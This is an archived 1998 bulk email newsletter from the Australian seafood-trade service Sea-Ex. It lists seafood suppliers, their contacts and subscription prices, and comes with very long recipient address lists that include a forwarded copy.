info@banxia.com; info@bavariacorp.com; info@blundellseafoods.com; info@ca-seafood.org; info@catalogmall.com; info@citgroup.com.cs; info@clearfreight.com; info@commodityspecialists.com; info@commodityspecialistscompsny.com; info@corp.maf.govt.nz; info@cylinder-slide.com; info@export.nl; info@frozenfish.com; info@fundch.cl; info@handycrab.com; info@harbinger.com; info@henningsen.com; info@hichina.com; info@ilmondo.com; info@infofish.com; info@insuracepros.com; info@liveseafood.com; info@mafi.com; info@meadowswye.com; info@pbb.com; info@pioneer97.co.uk; info@pro-bolivia.com; info@royal-import-export.com; info@sanford.co.nz; info@scanvec.com; info@schema.de; info@sportika.com; info@takari.com; info@tcal.com; info@tradepost-chat.com; info@visshop.com; info@world-trading.com; infoavi@mx.cei.gov.cn; infocom@del2.vsnl.net.in; information@deepseaproductsinc.com; information@intertrade.net; interagr@shadow.net; interdat@silverlink.net; interfoo.dltda001@chilnet.cl; interpex@usa.net; interprenr@aol.com; intlsupport@scanvec.com; isfoss@isholf.is; itc@ispinfo.com; itl@md2.vsnl.net.in; ivanindo@indo.net.id; iwads@wa.net; jablack@indiana.edu; jackch@nbnet.nb.ca; jahern@stavis.com; jahworks@erols.com; jajjr@ibm.net; jamesons@maui.net; janboseafood@hotmail.com; jankajander@hotmail.com; jarrod@pc.jaring.my; jason@solar.mxl.cetys.mx; jaster@ats.com.au; jathomas@northcoast.com; jaworski@gsosun1.gso.uri.edu; jayaar@globalnet.co.uk; jbfoods@zebra.net; jcao@chinatrade.net; jccdyin@asiaonline.net.tw; jcmw@sietic.qd.sd.cn; jdkap@bellsouth.net; jeff@clearfreight.com; jeffd@baaderna.com; jerry@tunacan.com; jetalt@dol.ru; jetson97@aol.com; jf@doris-and-eds.com; jfack@urnerbarry.com; jfsins@ibm.com; jhb@bluemar.co.za; jhoward@nssc.ca; jimbifford@aol.com; jimesal@earthlink.net; jimge@aros.net; jinkwan@hotmail.com; jirza@marinet.com; jkjms@redrose.net; jklose@colomsat.net.co; jkstill@bcbso.com; jluque@mail.udep.edu.pe; jmurr@xyz.net; jobol@acy.digex.net; john@canfisco.com; johnm@intersea-seafood.com; johnrube@aol.com; josie491@ms16.hinet.net; jpabitbol@groupe-jp-abitbol.com; jpvdwalt@iafrica.com.na; jrbadham@mts.net; jsbigley@efish.com; jsimpson@sinmark.com; jt@star-asia.com; jttheron@mweb.co.za; jumainte@emirates.net.ae; jun@iastate.edu; jwebb@usabalone.com; kadr@videotron.ca; kanpa@cyber.net.pk; karinacb@argenet.com.ar; kathie@mail.ioma.com; kaventerprises@rocketmail.com; kazykuro@aol.com; kbar1@tgn.net; kbwizzard@aol.com; kdahlmann@bharchetype.com; keywest@gate.net; keywest876@aol.com; khabbaz@cyberia.net.lb; kianghua@loxinfo.co.th; kim0233@maoyi.co.kr; kimg@sladegorton.com; kirk@sala.net; klarsen1@compuserve.com; klitz@aol.com; km@star-asia.com; kodiak@kodiak.org; kpeters@wave.co.nz; ksamy@pppindia.com; kstone@interpath.com; kvy@hkabc.net; kvy@hkstar.com; kvy@pworld.net.ph; kwolfe@intellistar.net; lampert@fortnet.org; lawrence@arrowac-merco.com; lbaugh@freeyellow.com; leadway@ibm.net; lechagua@ctcreuna.cl; lemmi@datacomm.ch; lgt@mweb.co.za; liform2@salus.zp.ua; lili@statics.com.ar; lincoln@cyberg.it; listmanager@hookup.net; liverock@tbsaltwater.com; ljchin@tiac.net; ljox@earthlink.net; lk@star-asia.com; lk-cabling@bnet.at; Lm.sales@laitram.com; lmartin713@aol.com; lobster@peionline.com; lockcom@hlc.com; lollo@lollo.com; longwharfcrab@worldnet.att.net; lossie@wintermute.co.uk; l-rtudel@gmunro.ca; lseafood@aol.com; ludshrimp@aol.com; lyonspk@biruni.erum.com.pk; m1699@mcia.com; maasilks@blr.vsnl.net.in; macpac@mnsi.net; madhavwp@gatewaytoindia.com; mail@americanfood.com; mail@import-export-training.com; mail@vanco.net; manager@brazilnetwork.com; manager@internationalist.com; marctrad@icanect.net; mareusz@post5.ele.dk; marine@xiamen.gb.co.cn; marketing@oceangarden.com; Marketing@pacseafood.com; martinez@colombianpost.com; masi@gmunro.ca; mateusz@post5.tele.dk; matthew.renton@virgin.net; maurop@sistel.it; mazzico@aol.com; mbanda@deltasys.co.zw; mbox1as@mbox3.signet.com.sg; mcclmatt@nicoh.com; mcrandy@oro.net; mczm@state.ma.us; m-du@gmunro.ca; medfish@midcoast.com; mellco@tradezone.com; mendipez@readysoft.es; mermaidtrevor@btinternet.com; metal@vldbros.com; mfi@super.net.pk; miasa@statics.com.ar; michael.charalambous@british-airways.com; midatl@dmv.com; midlink@emirates.net.ae; midlun@midlun.is; mie@projekti.cs.jyu.fi; mikes.pe@aol.com; milton@nicanet.nicanet.com.ni; milton@nicanet.nicanet.com.ni; mitco@cris.com; mjw@chaser.co.uk; mlc@uncc.edu; mloder1079@aol.com; m-naraj@gmunro.ca; moana@xtra.co.nz; moietc@china-times.com; morsey@clinic.net; mrfish1@gte.net; mrussell@rmgcal.com; msardine@mint.net; mt2c@highcountry.net; mtadler@stavis.com; mtlfish@msn.com; MOUNTAIN HARBOUR DIST. INC.; multinet@homeindia.com; mwoods@wesco-hln.com; najinlu@public.yc.nx.cn; nancy@divcom.com; nason01@unitel.co; nason01@unitel.co.kr; naturecst@aol.com; nazcahf@mail.cosapidata.com.pe; ncognitotx@aol.com; neonet@nlr.nl; nepfishnj@aol.com; nestor@easynet.fr; network@giasmd01.vsnl.net.in; newage@trade-trade.com; newsroom@s-t.com; nexter@camerdata.es; ng@public.nc.jx.cn; nigelstevens@amaltal.co.nz; nilefish@sukumanet.com; nino@ionino.com; nippon1@entelchile.net; niva@telecom.net.et; njm@sealord.co.nz; nlov@west.net; nmoore@nfi.org; nobi@arrowac-merco.com; noel.turner@turner.co.nz; noelwh@aol.com; nopalax@internet.dk; noplax@internet.dk; notifyme@thaitrading.com; npesrl@tin.it; nsdp@bumi.net.id; nusa@indobiz.com; oancarola@sit.com.ar; oarpanfish@msn.com; oasis-ie@yahoo.com; oceansur@argenet.com.ar; ocn@usa.net; ocnblu@worldnet.att.net; office@nfi.org; office@starfish.no; oicrh@public.sta.net.cn; oks@nwlink.com; ole.christian@tangtare.no; omartins@auracom.com; omblus@cie.ut.ee; opport@magi.com; osc29@idt.net; otnot@alaska.net; owner-fisheries@biome.bio.ns.ca; owner-gated-people@merit.edu; owner-saluqi-h@plaidworks.com; owner-ssl-users@mincom.com; pacific@ptalaska; pacmarltda@chilnet.cl; pacseaf@gte.net; pall@cs.ait.ac.th; palmar@bakki.is; paul@dimareseafoods.com; pearlmar@total.net; pedrogm@arrakis.es; pesca@md3.vsnl.net.in; pescainde@usa.net; philipdh@dantran.com; phillip.west@exco.co.uk; phillip@intersea-seafood.com; philrt10@aol.com; phoenix@ncll.com; pinefurn@countrycraft.co.za; piscicom@mdearn.cri.md; pkcs-tng@rsa.com; pmc@idola.net.id; pmcfu1@tp.silkera.net; pngroup@ksc.th.com; polonia@odyssey.on.ca; portcan@aol.com; ported@mc.net; post@wiex.com; postmaster@exegesis.co.uk; postmaster@plaidworkd.com; pr@dwtc.com; prideseafood@westal.net; priscicom@mdearn.cri.md; procheck@earthlink.net; project@chinatrade.net; promar@swbell.net; promart@loxinfo.co.th; promosys@flash.net; proyecta@netline.cl; ps@star-asia.com; psandvi@ibm.com; pubit@mo.nettuno.it; qiao898@hotmail.com; qsy@hotmail.com; quality@lombardis.com; quirtt@schneider.com; r0mtex@airmail.net; raga@md3.vsnl.net.in; raja@md2.vsnl.net.in; rajcal@giascl01.vsnl.net.in; rajudyog@md2.vsnl.net.in; registration@spch.com; relegon@aol.com; reneg@total.net; renjith-r@hotmail.com; resumes@indiaprimer.com; revboard-sec@pch.gc.ca; reza@ad1.vsnl.net.in; rfay@flfreezer.com; rfb@wco.com; rhayman179@aol.com; rherman@gnn.com; rhi@regal-hotels.com; rick@www.heyworth.com; rickg@ari1.com; riturralde@email.msn.com; rlandy@stavis.com; rlevy@stavis.com; rmarkley@southshoresins.com; rmeasley@usa.net; rmfl@xtra.co.nz; rmg@rmgcal.com; rmore@cri.com; robert.blake@marcodirect.co.nz; robertvilla@msn.com; rodan@vera.net; rofish@onxynet.co.uk; romining@netverk.com.ar; root@baires.com; rstavis@stavis.com; rswalaa@rite.com; rtb@hkstar.com; rudani@mail.sen.com.ph; russell@peninsulaseafoods.com; ryan@orcabayfoods.com; ryuan@deltatrak.com; s.h.surury@technologist.com; s621630@aix2.uottawa.ca; sadao@clearfreight.com; sailor@cam.org; salaud@compuserve.com; sales@abisnet.com; sales@atlanticseacove.com; sales@bcsockeye.com; sales@blazessi.com; sales@bqe.com; sales@dimarseafoods.com; sales@dkenterprises.com; sales@globalexporters.net; sales@ietglobal.com; sales@pro-bolivia.com; sales@pwseafood.com; sales@shoretodoor.com; sales@united-fisheries.co.nz; sales@vistafoods.com; sales@wrightlobster.com; salesmgt@simu.co.nz; salman@dhaka.agni.com; salmon@mint.net; salmon@norse-crown-seafood.dk; salmon@schooner.org; salqui-h-info@plaidworks.com; saltman@stavis.com; samcney@emeraldcoast.com; sameer@c2.net; sanders@inkweb.com;  textilesei@chaozhou.com; tfbayly@marcon.co.nz; tgilship@gmunro.ca; thaiccs@mozart.inet.co.th; thammerman@aol.com; thlgrp@pacific.net.sg; threshold@nisa.net; ticofish@sol.racsa.co.cr; tim@exegesis.co.uk; timpship@gmunro.ca; tims@linjk.freedom.com; tjffarms@aol.com; tkromano@email.msn.com; tkunzer@aol.com; tlspence@w3pr.com; tmarks@kendall.mdcc.edu; tmarr@downtime.com; tnrcfood@mbnet.mb.ca; tom@iu.net; tony@arrow-merco.com; top@manufacture.com.tw; topseafood@worldnet.att.net; towndock@pop3.ids.net; tpkorea@kotis.net; tpsftcc@public.sta.net.cn; tptelisr@netvision.net.il; trade@blackworld.com; trade@ch-non-food.com; trade@opportun.kc3ltd.co.uk; tradexsfds@aol.com; transdata@webworldinc.com; travel@travel.com.hk; trisport@iml-net.com.na; trueco@dhivehinet.net.mv; tscorp@bom3.vsnl.net.in; tsfi@thongsiek.com.sg; tsmith@catgraph.com; tuna@ralboray.com; tuna@seanet.com; turbos@turbosales.com; t-xanth@gmunro.ca; u.s.a.-Inoel180471@aol.com; ufi@gte.net; unibr@unitel.co.kr; unirel@pace.edu; unisee@aol.com; unitedimport@att.com; university@geographix.com; uscodex@aol.com; vacpacsf@mozcom.com; valpado@hotmail.com; vcilp@lumen.vcilp.ortg; vela@wave.co.nz; vfuks@jaguar.ir.miami.edu; vhg04@emirates.net.ae; victian@shell.tjvan.com.cn; victian@shell.tjvan.net.cn; victorray@aol.com; vietnam.order@cgtd.com; vipul@pobox.com; virginia@clearfreight.com; vishop@freemail.nl; visshop@dsv.nl; visshop@freemail.nl; vixens@ptialaska.net; vr4u@ksc8.th.com; vshlexps@hotmail.com; waag@email.msn.com; waltraut@arrowac-merco.com; wangh@mail.zlnet.co.cn; wangrap@public.ytptt.sd.cn; warcher@nafta.net; waynes@connet80.com; web@acdev.com; web@xmission.com; webhost@seafoodleader.com; webmaster@dragoncity.com.sg; webmaster@goldq.com; web-requests@www.aphis.usda.gov; wenqx@sd.cei.go.cn; westlake@globalvision.net; whigs@del2.vsnl.net.in; whm.fmii@auracom.com; wingtop@algonet.se; wiwate@cementhai.co.th; woceanus@aol.com; wolfmarine@aol.com; wolftanks@aol.com; wpwoods@aol.com; wrefhann@ihug.co.nz; wschin@ascl.com; wservice@simcoe.igs.net; wsking@ibm.net; wtcor@gdi.net; www.hunterss@sprynet.com; wsl@cerebalaw.com; www@scanvec.com; wytree@telekbird.com.cn; xcdc@xpublic.fz.fj.cn; xw@tdl-info.net; xzsawqe@emirates.net.ae; yangdong@public.jn.sd.cn; yesintl@flmarinenet.com; ylil@aol.com; young66@aol.com; ytzx@public.rzptt.sd.cn; zafir@home.com; zakat97@aol.com; John Arnold; zhangxn@hichina.com; zhwindow@pub.zhuai.gd.cn; ziplar@writeme.com; zoro@mpsnet.com.mx; zsy@pub1.fz.fj.cn; ztiec@public.hz.zj.cn; ztiec@ztiec.com; zxd@club.pages.com.cn; zxd1098@bigfoot.com; zxw@public.hz.zj.cn; bkmco@hotmail.com; callisfd@hotmail.com; shuler@computextos.com.pe; ecssfd@bellsouth.net; gamvie@pop3.concentric.net; expork12@ecua.net.ec; milton@nicnet.com.ni; itc@khi.compol.com; silvabue@totalnet.com.ar; active.83@netvision.net.il; Calembo@gnet.tn; ng@dcdmc.intnet.mu; abs@tassie.net.au; camtas@mox.com.au; freofish@icenet.com.au; demcos@ozemail.com.au; lee@sia.net.au; woodfish@pronet.com.au; sumnersf@oe.net.au; westmanp@acr.net.au; yoshida-H@syd.marubeni.co.jp; hirakitsukamoto@austrade.gov.au; lobsterdoc@aol.com; sjr@bb.rc.vix.com; sjoyce@thai.com; skip@futureone.com; cmsacv@debtel.com.mx
Subject: 	The Catch of the Week

                               
 

             The Catch of the Week
         SEAFOOD INDUSTRY INFORMATION SERVICE
 
Hello, welcome to the "NEW" newsletter, now available via e-mail  from SEA-EX.
 
As you know, Sea-Ex is an Australian company which provides a service connecting buyer to seller - DIRECT.  We are now expanding our newsletter to cover e-mail. 

This service provides you with an opportunity to promote and expose your company and products to numerous contacts in the seafood industry both in Australia and abroad, weekly.  It is a simple, yet effective way to promote yourself - Direct to your industry.  

To place your FREE classified see below.

                      THIS IS WEEK ONE (1) OF A FREE FOUR (4)  WEEK TRIAL.
We would also welcome comments you may have regarding this newsletter, and we are also open to any suggestions to improve this service.
 
1.  Uptop Fisheries Pty Ltd                AUSTRALIA                                        OPEN MARKET
Goods supplied:  Sharkfins (Wet), Shark cartiledge (frozen), Shark & mackeral fillets & trunks (frozen)
Contact Jenny Davies  uptop@iinet.net.au
 
 
2.  Adelaide Bay Seafoods Pty Ltd               AUSTRALIA                           OPEN MARKET 
Goods supplied:  Live and frozen greenlip and blacklip abalone.
Contact:  Loraine Kossmann    abs@tassie.net.au
 
3.  Cameron of Tasmania Pty Ltd                   AUSTRALIA                         OPEN MARKET               
 Goods supplied:  Live pacific oysters, frozen half shell Pacific oysters, Golden Pacific Oysters.
Contact:  Michael Cameron or Edgar Burtschner        camtas@mox.com.au
 
4.  Oakfair International                                     AUSTRALIA                         OPEN MARKET
Goods supplied:  sardines (WR & Fillets), Cod (H&G and fillets), Alaskan Pollock (H&G and Fillets), Scallops, Squid, Octopus, Sockeye Salmon, Pink Salmon, Chinook Salmon, Chum Salmon, Coho Salmon, Flounder.
Contact:  Charlie   oakfair@icenet.com.au
 
5.  Pacific Business Pty Ltd                              AUSTRALIA                        OPEN MARKET
 Goods supplied:  Representative of "Golden Emperor" canned Abalone, exporter of "Pacific" canned Abalone, Frozen, Live, Cooked Abalone.  Frozen Scallops, fish and seafood.
Contact:  Stephen Lee   lee@sia.net.au
 
6.  Wood Fisheries Pty Ltd                                AUSTRALIA                       OPEN MARKET
Goods supplied:  Stout whiting, yellow-tail scad, tuna, finfish and deepwater finfish.
Contact:  A.K. (Sandy) Wood-Meredith   woodfish@pronet.com.au
 
7.  Fremantle Fish Farms                                  AUSTRALIA                       AUSTRALIA ONLY
Goods supplied:  Sardines (WR & Fillets), Alaskan Cod (H&G and fillets) Smoked Russian Sockeye Salmon.
Contact:  Steve Wilkinson    freofish@icenet.com.au
 
8.  Demcos Seafoods Pty Ltd          AUSTRALIA                  SYDNEY     AUSTRALIA ONLY
Restaurants a speciality. Providors of Finer Seafood.   Seasonal fresh produce of TOP QUALITY.  
Inquiries, contact Con or James   demcos@ozemail.com.au 
 
9.  Moana Pacific Fisheries Ltd                   NEW ZEALAND                    OPEN MARKET
Goods supplied:  FROZEN:  Alfonsino, barracoutta, cardinal, flake, flounder, New Zealand sole, lemon sole, orange roughy, monkfish, rubyfish, scampi, snapper, gemfish, hoki fillets.  FRESH:  Bluenose, snapper, tarakihi, orange roughy, live greenlip mussels, flounders, gurnard, moonfish, john dory, groper/bass, trevally, broadbill swordfish.
Contact:  Rachel Joughin or Bruce Bird    moana@xtra.co.nz 
 
10.  Great White Holdings Pty Ltd                 AUSTRALIA                       OPEN MARKET
Goods supplied:  Live mud crabs, live pippies, live Pacific oysters.
Contact Nick or Stan    mudcrabs@zed.org 
 
11.  Global Seafood Fisheries                        AUSTRALIA                       OPEN MARKET
 
Goods supplied:  Coral trout (frozen raw), Tropical lobster tails, mullet roe, scallop meat - roe off.  Fresh fish.
                          Frozen Prawns:  Banana, Endeavour, King and Tiger.
Contact:  Neal Harris    glosea@bigpond.com
 
12.  Sumner Seafood Export Australia                                                    OPEN MARKET
Goods supplied:  LIVE coral trout, LIVE Lobster.  LIVE spanner and mud crabs.  Frozen and Chilled reef fish and estuary fish and frozen Queensland scallops.
Contact:   David Hoac     sumnersf@oe.net.au 
 
13.  P & E Foods Inc               Hawaii USA                                               OPEN MARKET
Goods Supplied:  Frozen seafood, pork, meat, poultry.  Fish, shellfish, lobster, crab.
Contact:  Stephen S.C.Lee        Telephone:  + 1 808 839 9094           Fax:  + 1 808 833 5182
 
14.  Pacific Marine Farms 1996 Ltd          NEW ZEALAND                 OPEN MARKET
Goods supplied:  1/2 shell oysters - chilled and frozen
Contact:  Vince Syddall           Telephone:  + 64 7 866 8564             Fax:  + 64 7 866 8753 
 
15.  Clyde River Oyster Company           AUSTRALIA                        AUSTRALIA ONLY
Goods supplied:  Clyde River (Australia) Oysters.
Contact:    Mr Bill Suter  suters@acr.net.au         or       Mr Paul Westman     westmanp@acr.net.au 

 
                              --------------------------oooOOOooo-------------------------------

Above are just some of our suppliers listed in our Directories of Seafood Suppliers.  For more information, see our website at http://www.big.net.au/~seaex.   When contacting these people, be sure to mention SEA-EX!!!

If you would like any further information regarding the above companies, please e-mail us your enquiry to seaex@big.net.au
 LIST YOUR "CLASSIFIED"  HERE
Here is a place to list your "classifieds" regarding your industry.  Buy, sell, offer, wanted, promote etc.
To list a classified please click on : seaex@big.net.au 
Remember to include your contact details, so that people can contact you!

To stop receiving this newsletter,  please email us at seaex@big.net.au and in the subject line please put "No News to:  (your e-mail address)"
 
 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
AFTER YOUR FREE TRIAL, IF YOU WOULD LIKE TO CONTINUE RECEIVING THIS SERVICE COSTS WILL BE AS FOLLOWS:

1 MONTH SUBSCRIPTION     ......................         AUD$30.00
3 MONTH SUBSCRIPTION     .....................                 AUD$75.00 
6 MONTH SUBSCRIPTION     ......................         AUD$140.00 
12 MONTH SUBSCRIPTION   ......................                AUD$250.00 
 
PAYMENT VIA CHECK, MONEY ORDER, BANKCARD, MASTERCARD OR VISA.
Please e-mail with a "request for Subscription Form" in the subject header, and provide your fax or postal details. 
 
Disclaimer
All classifieds are submitted by individual companies.  While every care has been taken in compiling this newletter, Sea-Ex will not be held responsible for any error or omissions.  The advertising in this newsletter is the sole responsibility of the companies who place the classifieds and Sea-Ex will not be held liable in any way for any loss or injury whatsoever, in business dealings with these companies. 
 

 

<<File: ATT00000.htm>><<File: ATT00001.jpg>><<File: ATT00002.jpg>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Belinda Cook <doverfis@ozemail.com.au>
Date: Wed, 5 Aug 1998 03:10:16 -0700 (PDT)
To: "402000155@edi.de>
Subject: RE: The Catch of the Week
Message-ID: <01BDC07E.E1BCC8E0@sladl4p61.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Sea-Ex[SMTP:seaex@big.net.au]
Sent: 	Wednesday, 5 August 1998 11:25
To: 	abafish@midwest.com.au; t.lewis@agsci.utas.edu.au; richig@g150.aone.net.au; amrico@ynet.y-net.com.au; pkrogh@powerup.com.au; aquatas@tassie.net.au; ari@argonaut.com.au; gwk2103@midcoast.com.au; sydaatz@ozemail.com.au; austfish@uret.net.au; Cheryl.Stanilewicz@austrade.gov.au; delia.ancrum-tennyson@austrade.gov.au; sean.riley@austrade.gov.au; newfish@icenet.com.au; peteryau@smart.net.au; colin@bight.com.au; 100245.2366@compuserve.com; austsea@pl.camtech.net.au; athors@ozemail.com.au; beku@southcom.com.au; bemco@bigpond.com; suters@acr.net.au; blueseas@blueseas.com.au; taspac@m140.aone.net.au; csi@squirrel.com.au; cccs@fastlink.com.au; gordon.yearsley@marine.csiro.au; tbp@bigpond.com.au; dominic@acay.com.au; delsea66@wizard.teksupport.net.au; djhfood@ecn.net.au; doverfis@ozemail.com.au; eppl@ca.com.au; erimusbl@ozemail.com.au; chen@seol.net.au; faroint@geko.net.au; fijifish@ozeafood.com; fisman@lisp.com.au; kippo@onaustralia.com.au; frionor@melbourne.starway.net.au; goodbran@next.com.au; glosea@bigpond.com; mcgrath@compack.com.au; mudcrabs@zed.org; trades@ibbco.aust.com; interon@ozemail.com.au; jbcfoods@internetnorth.com.au; johnjbsmarketing@bigpond.com; heriot@malvern.starway.net.au; kailis@enternet.com.au; lisa@kfm.dializ.oz.au; brolos@midwest.com.au; kenbry@onthenet.com.au; kvy@iig.com.au; kaquam@eisa.net.au; kvytas@eisa.net.au; marron@wn.com.au; derekw@powerup.com.au; con@dove.net.au; lonimar@ozemail.com.au; jai@one.net.au; mackayreef@m130.aone.net.au; exec@magnum.com.au; mncrdb@midcoast.com.au; milligan@iinet.net.au; jwilliams@mitco.com.au; mulataga@nettrek.com.au; munroint@bigpond.com.au; fishing@mures.com.au; warren@nswabalone.com.au; newberys@compuserve.com; ruelloinc@wr.com.au; nortas@netspace.net.au; oakfair@icenet.com.au; oceanic@oceanic.com.au; centavo@klever.net.au; pandm@ozemail.com.au; pacbasin@locainet.com.au; hanbo@vision.net.au; rdsimp@ozemail.com.au; roger@eis.net.au; pbros@poulosbros.com.au; cqcray@tpgi.com.au; andyjc@rainbowvalley.com.au; raptxpbr@ozemail.com.au; rathty@ncomm.net; redgum@networx.com.au; restfish@cairns.net.au; ricland@hotmail.com; jordans@mail.bigpond.com; seaforce@werple.net.au; seafresh@ozemail.com.au; johnperry@vicnet.net.au; sea@sealanes.com.au; scanning@iconnect.net.au; sori@pl.camtech.net.au; skolb@treko.net.au; swanboathire@beachaccess.com.au; sydfish@poulosbros.com.au; tas.fish@tassie.net.au; redfin@tassie.net.au; tascfood@ozemail.com.au; tassal@tassal.com.au; rebel-marine@iif.com.au; unichef@ozemail.com.au; uptop@iinet.net.au; ufish@peg.apc.org; wlake@midcoast.com.au; aqua@wn.com.au; weststate@accessin.com.au; bazza@ois.com.au; dcrichton@raptis.com.au; goodfood@ozemail.com.au; nifty6@hotmail.com; aquacns@sunshine.net.au; austrimi@onaustralia.com.au; 102060.3177@compuserve.com; 102400.611@compuserve.com; 103201.2076@compuserve.com; 1seafood@gte.net; 402000155@edi.de; 4272199@pager.mirabilis.com; 72530.2606@compuserve.com; 74133.231@compuserve.com; 76130.3373@compuserve.com; a.a.ali@cyber.net.pk; a39h0428@daisy.bu.ac.th; a912t19@idt.net; aarax@emirates.net.ae; access@seanet.com; accordim@ix.netcom.com; acee@raleigh.ibm.com; acmefish@aol.com; active83@netvision.net.il; admin@golden-trade.com; admin@infomare.it; admin@trade-express.com; administrator@ms.anfeng.com.tw; aef375006@pbs6.milton.port.ac.uk; aespeleta@compunet.net.co; afta@halcyon.com; agv@riverside.com; aj.lagemaat@hasdb.agro.nl; akafi@hotmail.com; akiko@nz.com; akoromilas@aol.com; akreds@aol.com; alabbas@super.net.pk; alainlange@hotmail.com; alan@astrainfo.com; alasund@ok.is; alberti@alberti-import-export.com; alconed@nexo.es; aldenaro@juno.com; aldot@usa.net; alfordj@digitalexp.com; alford-j@popmail.firn.edu; algaetech@maine.com; al-khulaqsaj@cardiff.ac.uk; allaboutexport@allaboutexport.com; alnida@giasmd01.vsnl.net.in; alpbay@aol.com; alphins@nceye.net; alsaeurope@glo.be; alzubedi@hotmail.com; amac@newave.net.au; amazonfish@aol.com; amazonpp@gate.net; ambrosca@ix.netcom.com; amesfer@khaleej.net.bh; amfood@netside.net; ampac@usa.net; anali@slt.lk; anandhi@giasmd01.vsnl.net.in; anders.wennerblom@bfc.umea.se; andre@galaxy-7.net; andreae@seaharvest.co.za; andujar@coqui.net; annette@bom3.vsnl.net.in; anova@anovafood.net; anton.triasta.citarate@ibm.net; antons@ww.co.nz; aolim@pacific.net.sg; aparrna@giasmd01.vsnl.net.in; apbimbo@crosslink.net; apexport@giascl01.vsnl.net.in; aquajet@ix.netcom.com; aquaman14@hotmail.com; aquamarsd@msn.com; arcpac@usa.net; areacode@sirius.com; arf@northcoast.com; arodri@hermes.uninet.net.mx; arqueo@pananet.com; art@the-wire.com; ashraf-hafez@usa.net; assistan@argenet.com.ar; aswin@md2.vsnl.net.in; athar@pak.net; atlahua@exxor.red2000.com.mx; atlahua@mail.red2000.com.mx; atlantic@atlantic.no; atldir@cgocable.net; ato@internet-fr.net; auction@ime.net; ausender@hotmail.com; avra@giasmd01.vsnl.net.in; bamboobridge@valise.com; bas@cerf.net; bastasic@modesty.bl.ac.yu; baymail@datasync.com; bbs@visi.com; bdaplace@iamerica.net; bearcat1@teleport.com; bell@giasmd01.vsnl.net.in; bensouda@moroccouscouncil.org; bgaines@lausd.k12.ca.us; bgill@citrus.infi.net; BH1099@aol.com; bikky@giasdl01.vsnl.net.in; bill@envirotainer.com; bionov@qbc.clic.net; bizhelper@angelfire.com; bizopp@forfree.at; b-jack@gmunro.ca; bjorn@ok.is; bleblanc@stavis.com; bliintl@cyberway.com.sg; blktigr@msn.com; blount@ix.netcom.com; bmaver4843@aol.com; boards@vldbros.com; bob@mcs.nl; boeki@netlaputa.ne.jp; bonecom@indosat.net.id; bonmark@zoo.co.uk; borzysz@friko2.onet.pl; borzysz@kki.net.pl; borzysz@polbox.com; bosbaybsn@msn.com; botsford@nbnet.nb.ca; bowen@zoomnet.net; bpeters@c4.net; brdbinca@aol.com; bregliano@big.it; brendanc@jetcity.com; brian@intersea-seafood.com; brian@neptunetrading.com; bright@bangla.net; brunop@idirect.com; bsd@mnet.fr; bstavis@stavis.com; bstrack@micron.net; btruedale@techpak.com; btruesdale@techpak.com; burren.fish@iol.ie; bziemann@aol.com; callissfd@hotmail.com; caltec@netvision.net.il; camanchaca@chilnet.cl; candying@bellsouth.net; cantanzaro.rich@heb.com; capeq@tiac.net; capitaine.cook@wanadoo.fr; capt.kev@usa.net; captcarl@haccp-seafood.com; captpaul@ptialaska.net; cardrest@gte.net; careers@careers.co.nz; carl@media.org; carol@gb.is.is; casafonso@aol.com; catanzaro.rich@heb.com; catchday@bellsouth.net; catego@i3d.qc.ca; ccdining@communique.net; cclink@idirect.com; cclong@redrose.net; cdtitles@world.std.com; ceyfoods@sri.lanka.net; cfxa31a@prodigy.com; c-gill@gmunro.ca; chandroo@rocketmail.com; changyun@public.nbptt.zj.cn; channel@icanect.net; charles@mcs.nl; chauvin@shrimpcom.com; cheena@mindlink.bc.ca; chesfishco@aol.com; chfish@cport.com; chinafish@china-fish.com; chips@geogr.ku.dk; chocolate@creativetreets.com; chris.carlson@pyamonarch.com; chris@clearsprings.com; christin.riise@atlantic.no; cian@gmunro.ca; cj@star-asia.com; cjmcoltd@ms13.hinet.net; cjnp@telcel.net.ve; ckeyes@iclp.com; ckeyes@mnib.com; clarke@marinefoods.co.nz; clarkew@allust.com.au; clickware@aol.com; cliff@key-west.com; clnis@clnis.inet.fi; clrfsfo@clearfreight.com; cnazca@perusat.net.pe; cockle@nzcockle.co.nz; cohansfd@aol.com; colland@earthlink.net; collins@myriadgate.net; comments@funbarbados.com; comments@global-imp-exp.com; comodity@gate.net; connors@exodus.uk.com; cooper@connors-seafoods.co.uk; coral@dhivehinet.net.mv; correo@avillar.es; cost@tkp.riga.lv; cottage@shore.intercom.net; coven@tin.it; cpayne@cwo.com; cpersio@csrlink.net; c-pride@juno.com; cpshkcom@netvigator.com; crawfish@microweb.com; crotonainternational1@home.com; cs-k@nnr.co.jp; csp@zebra.net; CTcallah@ix.netcom.com; cthomas@thomas-enterprises.com; ctk@worldnet.att.net; ctzj@pub.zjpta.net.cn; curinde@curacao.com; Custserv@fisherseafood.com; cypherpunks@toad.com; dabomb3044@aol.com; daciec@mail.dalian-gov.net; dacocorp@ix.netcom.com; dan@siri.org; dana@greatseafood.com; danex@vip.cybercity.dk; daruma@gte.net; david@cn.net.au; david123@gte.net; davids@saol.com; dawsonpaul@bigpond.com.au; dbfc@newportnet.com; dbilderb@pld.com; dbreede@ais.net; dd@star-asia.com; decay@flash.net; decdeb@tinet.ie; dedwards@iclp.com; dedwards@mnib.com; den@alona.net; dennis@rainbowtuna.com; dennisk@mitsui-foods.com; destudio@public1.sz.js.net; developers@reckon.com.au; devinequi@aol.com; dherrilko@webtv.net; dichten@hotmail.com; dim-daniels@aaf-hq2.tyson.com; dinon@dinon.com; divsfdsvc@ala.net; djfitz@iafrica.com; dkrishna@giasmd01.vsnl.net.in; dmine@ffb.fr; dongtai@public.cz.js.cn; donthompsonhaccp@msn.com; dorothy.ortale@yale.edu; drudie@ix.netcom.com; druin@laker.net; ds@star-asia.com; dsx@xnet.com; dunns@clubi.ie; dusan@menadzer.com; dutchi@netvision.net.il; dynamic@mweb.co.za; easleyj@doacs.state.fl.us; ebiberger@stavis.com; e-commerce@ceiec.com; ed.noel@snet.net; edepa@argenet.com.ar; editor@cbn.co.za; ekkwill@compuserve.com; elishias@onslowonline.net; elmara@rad.net.id; emes@brigadoon.com; emiliani@usa.net; emirikol@swbell.net; emmitt@clinic.net; envirotainer@envirotainer.com; ephemera@light.lightlink.com; erukos@sureste.com; estavis@stavis.com; ethedm@gte.net; eugenesu@ms13.hinet.net; eurotank@atlantic.net; evaldas@bi.balt.net; evarga@doc.gov; evolution@webdepart.com; exfresh@aol.com; 